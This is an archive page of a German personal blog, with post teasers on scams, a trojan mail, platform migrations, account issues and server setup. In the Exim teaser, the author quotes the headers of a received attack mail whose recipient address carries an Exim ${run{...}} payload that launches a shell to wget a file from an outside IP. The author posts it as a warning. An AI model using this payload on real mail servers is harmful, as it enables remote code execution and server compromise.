Froschs Blog

Computer und was das Leben sonst noch so zu bieten hat

Zur Website | Impressum

Archiv der Rubrik 'Internet'

Trojaner-Versand nach geknacktem Account

Montag, 16. September 2019

Richtig gelesen: „nach“, nicht „mit“.

Ich bekam heute Vormittag eine E-Mail, die scheinbar von einer Firma kam, mit der ich bis vor ein paar Monaten gelegentlich in Kontakt stand. Scheinbar, weil die Absender-Adresse nicht dazu paßte. Die Firma hat eine eigene Domain mitsamt MX, verschickt also normalerweise auch E-Mails unter dieser eigenen Domain. Aber die Absender-Adresse dieser E-Mail war eine völlig andere.

In dieser E-Mail wurde eine E-Mail von mir an die Firma zitiert, ein typischer Vollquote, darüber stand ohne Anrede „wie besprochen, in der Anlage die angeforderte [sic!] Informationen.“ Allerdings hatte ich diese E-Mail bereits Mitte Januar geschrieben gehabt; es war die letzte Mail, die ich dorthin geschickt hatte (und die war damals auch beantwortet worden). (mehr …)


Tschö WordPress, hallo ClassicPress!

Montag, 29. Juli 2019

Seit letztem Jahr schon geplant, endlich habe ich es geschafft: Den Wechsel von WordPress zum Fork ClassicPress. Schon vor längerer Zeit hatte ich einen Anlauf genommen und versucht, ein nicht mehr aktiv genutztes Blog testweise umzustellen, bevor ich an dieses hier gehe. Es funktionierte damals aber nicht; die Umstellung blieb mit einer Fehlermeldung quasi mittendrin hängen. Daher nahm ich erstmal davon Abstand, zu versuchen, auch dieses Blog umzustellen.

Der Wechsel wird durch ein Plugin bewerkstelligt, und dieses lag damals in einer Version 0.5 oder so vor. Entwickler behaupteten in ihrem Forum, der Fehler, der bei mir auftrat, sei weder bekannt noch nachvollziehbar. Also so ein Fall von „das passiert mal wieder nur mir“. (mehr …)


Western Union und der seltsame Mailserver

Samstag, 27. Juli 2019

Im Nachklapp zu der Gambia-Geschichte bleibt noch etwas, was ich mal separat aufschreibe, weil es damit vermutlich nicht direkt zusammenhängt. Kurz: Entweder hat Western Union einen kaputten Mailserver oder ist undicht.

Denn nur eine halbe Stunde nach der Anmeldung bei Western Union mit einer speziell dafür angelegten Mailadresse (so'n eigener Mailserver ist ja doch für was gut) versuchte ein Host über Tage hinweg, E-Mails an genau diese Adresse einzuliefern, scheiterte jedoch an meiner Konfiguration: (mehr …)


Gambia-Scam

Samstag, 27. Juli 2019

Manchmal fällt auch bei mir der Groschen nur pfennigweise. Ich wußte nicht, daß es diese Scam-Variante gibt, und hatte erst auch keine Hinweise gefunden. Erst heute, als ich die Suchbegriffe änderte. Mein Bauchgefühl war, sagen wir, indifferent – was ich seltsam fand, hätten ja auch, sagen wir, kulturelle Unterschiede gewesen sein können, und ich wollte sicher sein, mir da keine Vorurteile aufzubauen. Dabei hatte ich Verdachtsmomente gehabt. Allerdings ging es mir in den letzten Wochen auch nicht gut, meine Konzentration war tageweise ziemlich im Eimer. Das mag auch eine Rolle gespielt haben. – OK, von vorn.

Ich bin auf einen Scam hereingefallen, und ich erzähle Euch das ausführlich, damit es Euch nicht auch passiert. Es fing harmlos an: Ein Account mit dem Twitter-Handle @Modoulamindram3 folgte meinem. Nichts Ungewöhnliches. Ungewöhnlich war die Herkunft: Gambia, Westafrika. Das war am 24. Mai gewesen. Ich wurde neugierig und folgte zurück. Allerdings war mir durchaus aufgefallen, daß der Account bis zu diesem Zeitpunkt ganze 10 Tweets abgesetzt hatte, die direkt an andere Accounts gerichtet waren und meistens aus Smalltalk bestanden, also „wie geht es Dir“ oder „wie ist das Wetter bei Dir“. (mehr …)


Achtung, Exim-Bug unterwegs!

Donnerstag, 20. Juni 2019

Gestern erhielt ich zwei … „interessante“ E-Mails an den root-Account meines Servers. Der Body war jeweils leer. Der Header sieht so aus:

Return-Path: <support@service.com>
X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f176.9.63.237x22}}@atari-frosch.de
Delivered-To: root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f176.9.63.237x22}}@atari-frosch.de
Received: from service.com (flamingw.arvixecloud.com [108.175.157.131])
        by mail.atari-frosch.de (Postfix) with SMTP id B61EAC9E8;
        Wed, 19 Jun 2019 16:58:45 +0200 (CEST)

Darunter folgten noch 31 Received-Zeilen, die jedoch nur jeweils die Zahlen von 1 bis 31 enthielten. Die To:-Zeile ist dabei das Spannende: (mehr …)


#WirSindDieBots!

Samstag, 23. März 2019

Heute fanden europaweit Demonstrationen gegen die sogenannte europäische Urheberrechtsreform (eigentlich, wie @alios richtig darlegt, eine Verwerterrechtsreform) statt. Mein Plan war es gewesen, nach Heidelberg zu fahren, um dort die von Alex Schestag angemeldete Demo zu unterstützen und zu fotografieren, aber dann funkte mir leider eine Hals- und (mal wieder) Luftröhrenentzündung dazwischen, und ich mußte zu Hause bleiben.

Das gab mir immerhin die Gelegenheit, mal zu versuchen, die Teilnehmerzahlen zumindest bei den Demos in Deutschland zusammenzutragen. Es war gar nicht so einfach gewesen, dem Hashtag #Artikel13Demo zu folgen; da kam einfach deutlich mehr pro Minute rein, als ein Mensch direkt mitlesen kann. Daher fragte ich bei einigen Leuten, die aus bestimmten Städten berichteten, auch gelegentlich direkt nach, wieviele „Bots“ denn gekommen waren. Das hier ist das vorläufige Ergebnis: (mehr …)


Account bei Patreon schließen

Donnerstag, 7. Februar 2019

Einen Account auf Patreon aufmachen ist einfach.

Ihn aber dann zu schließen, ist so Passierschein-A38-mäßig. Das sieht dann nämlich so aus:

Man geht auf die Einstellungen für den Account, wo ganz unten die Option zu finden ist, den Account zu schließen. Natürlich mit fetter Warnung, daß das dann dauerhaft und für immer ist und so. Wenn man da draufklickt, wird aber keineswegs einfach der Account geschlossen. Das wäre zu einfach. (mehr …)


Abschied von Google+

Donnerstag, 31. Januar 2019

Bereits am 10. Dezember hat Google den Zeitplan bekanntgegeben, um Google+ zu schließen: Im April dieses Jahres soll es nun bereits soweit sein. Ich war auf dieser Plattform seit Mitte Juli 2011 aktiv, und da haben sich so einige Beiträge angesammelt. Viele davon sind „nur“ kommentierte oder auch einfach unkommentierte Links zu Artikeln. Trotzdem hatte ich die Idee, den ganzen Krempel auf einer Subdomain in ein ClassicPress einzulesen und weiterhin öffentlich verfügbar zu halten.

Die Sache hat allerdings so ein paar Haken.

Ich habe mir vorhin per Takeout meine Beiträge usw. von Google+ heruntergeladen. Was da ankam, war ein knapp 1 GB großes ZIP-Archiv mit sämtlichen Beiträgen und den dazugehörigen Metadaten und Fotos. Die Beiträge selbst sind in HTML gehalten, mit Inline-CSS. Das sieht dann so aus (Ausschnitt): (mehr …)


Polizeiticker

Mittwoch, 16. Januar 2019

Anhand der heutigen Meldungen zu den Ku-Klux-Klan-Durchsuchungen (zum Beispiel im Tagesspiegel: 100 Waffen sichergestellt: Razzia gegen mutmaßliche Mitglieder eines Ku-Klux-Klans) habe ich eben festgestellt: Der RSS-Feed von Presseportal/Blaulicht, abgerufen alle 15 Minuten, liefert mir nicht alle Nachrichten.

Ich hatte die Meldungen bei Tagesspiegel, Tagesschau, n-tv usw. gesehen und mich gewundert, warum ich die nicht im Feed des Blaulicht-Tickers habe. Also bin ich mal direkt auf die Website und siehe da: Drei Meldungen von verschiedenen Dienststellen gab es da von heute, einmal 14:00 Uhr, einmal 15:33 Uhr und einmal 15:34 Uhr (wobei sich zwei davon auf die erste vom LKA Baden-Württemberg beriefen). Alle drei waren nicht bei mir angekommen. (mehr …)


Wie mir das Internet™ eine neue Kamera schenkte

Montag, 28. Mai 2018

Am 26. April 2018 ging meine Canon EOS 350D in Rente. Und da dachte ich mir, vielleicht könnte mir dieses Internet™ ein bißchen dabei helfen, zumindest an einen gebrauchten 350D-Body zu kommen, ohne daß ich meine knappen Finanzen dafür überstrapazieren müßte. Sozusagen als Geburtstagsgeschenk. Also eröffnete ich am 10. Mai eine Sammlung auf Leetchi in der Hoffnung, mit ein paar Beiträgen zumindest einen Teil der dafür nötigen rund 75,00 € zusammenzubekommen.

Um einen üblichen Clickbait-Anreißer zu benutzen: Ihr glaubt nicht, was danach passierte … 😉 (mehr …)


Wie man ein Skype-Paßwort (nicht) recovert

Mittwoch, 7. März 2018

Heute Nachmittag saß ich vor einem schon recht betagten PC, einem Dell mit Pentium D, mit einem Windows XP. Die wichtigste Aufgabe an diesem PC: Das Skype-Paßwort des Nutzers herausfinden. Der Eigentümer des PCs hatte das Gerät mehrere Jahre lang nicht benutzt (ein relevanter Datei-Zeitstempel wies auf September 2015), hatte sein Paßwort vergessen und wollte es jetzt da rausgezogen haben, um Skype von einem anderen PC aus nutzen zu können. Sollte eigentlich zu machen sein, oder?

Tja, sollte. Die Praxis sah dann doch etwas anders aus … (mehr …)


Vorhaben für 2018

Montag, 8. Januar 2018

Nachdem das erste Jahr ohne Depressionen – der kurzfristig durch ein Medikament hervorgerufene akute Schub zählt nicht – herum ist, könnte ich theoretisch jetzt eine ganze Menge Dinge tun. Aber wie schon im Jahresrückblick erwähnt, liegt da noch so viel Übriggebliebenes aus den verlorenen 15 Jahren an, und Neues kommt ja auch ständig wieder dazu. Das zu ordnen und zu strukturieren ist gar nicht so einfach – schon gar nicht für einen Singletasker. Das Motto des Jahres war denn auch: „MAN KOMMT JA ZU NIX!“

Heißt: Ja, natürlich habe ich Dinge vor. Ziemlich viele sogar bzw. ziemlich zeitaufwendige. Aber ich habe nicht vor, mich dafür zu geißeln, wenn was nicht klappt. Düsseldorfer Repressionsämter, Euch schau ich an: Ihr schuldet mir immer noch was. (mehr …)


WordPress.com-Account mit seltsamen Eigenheiten

Samstag, 25. November 2017

Mit meinem Account bei WordPress.com – also auf der Site, auf der sich jeder Mensch ein Blog einrichten kann, ohne sich WordPress selbst installieren zu müssen – beobachte ich schon seit längerem einen seltsamen Effekt. Meine diesbezügliche Mail von letztens an die Betreiber (verschickt über ein Webformular dort) ist wohl in /dev/null verschwunden; eine Antwort habe ich zumindest nicht bekommen.

Ich nutze den Account von zwei Geräten aus: meinem PC und meinem Smartphone. Das heißt aber offenbar nicht automatisch, daß ich mit beiden Geräten die gleichen Aktionen durchführen kann. Mehr noch: Am PC sieht es so aus, als ob Aktionen, die ich mit dem Smartphone durchführe, von einem anderen Account kämen, obwohl das nachgewiesenermaßen gar nicht der Fall ist. Genauer: (mehr …)


Blaue Mogelpackung

Donnerstag, 23. November 2017

Ich habe gerade mein Prepaid-Guthaben bei Blau.de aufgeladen und wunderte mich dann ein wenig über die Bestätigungs-SMS: Da wurde mir nämlich mitgeteilt, das Guthaben sei bis 20.12.2017 gültig. Der Tarif, den ich gebucht habe, ließ mich bisher immer für 30 Tage „surfen“. 30 Tage ab (und inclusive) 23. November würden aber bis 22. Dezember laufen, nicht nur bis zum 20. Dezember.

Also suchte ich nach einer Möglichkeit, das mit Blau direkt zu klären. Auf der Website gibt es keine Mailadresse und nur eine 0800-Telefonnummer, die sich als „Bestell-Hotline“ meldet. (mehr …)


Mumble-Server (murmurd) auf Debian Jessie

Donnerstag, 10. August 2017

Weil wir schon grad bei neuen Diensten sind … dieser Tage hatte ich der DinLUG – Dinslakener Linux User Group Hosting zugesagt. Und zwar nicht nur das Blog, sondern auch einen Mumble-Server. Letzteres interessierte mich auch selbst, deshalb habe ich zugesagt, einen solchen zu installieren.

Mumble ist eine freie Sprachkonferenzsoftware, die sich wegen niedriger Latenzzeit und guter Audioqualität für alle Arten von Audio-Konferenzen eignet. Die Verbindungen zwischen Server und Client sind dabei grundsätzlich verschlüsselt.

Die Installation ist weniger kompliziert, als ich befürchtet hatte:

:~$ apt-get install mumble-server

– und dann ist schon alles da. Die Konfiguration erfolgt über eine einzelne Datei, nämlich /etc/murmur-server.ini, die auch nicht sonderlich umfangreich ist. Aber natürlich gibt es auch Fußangeln, sonst wäre ja alles zu einfach. (mehr …)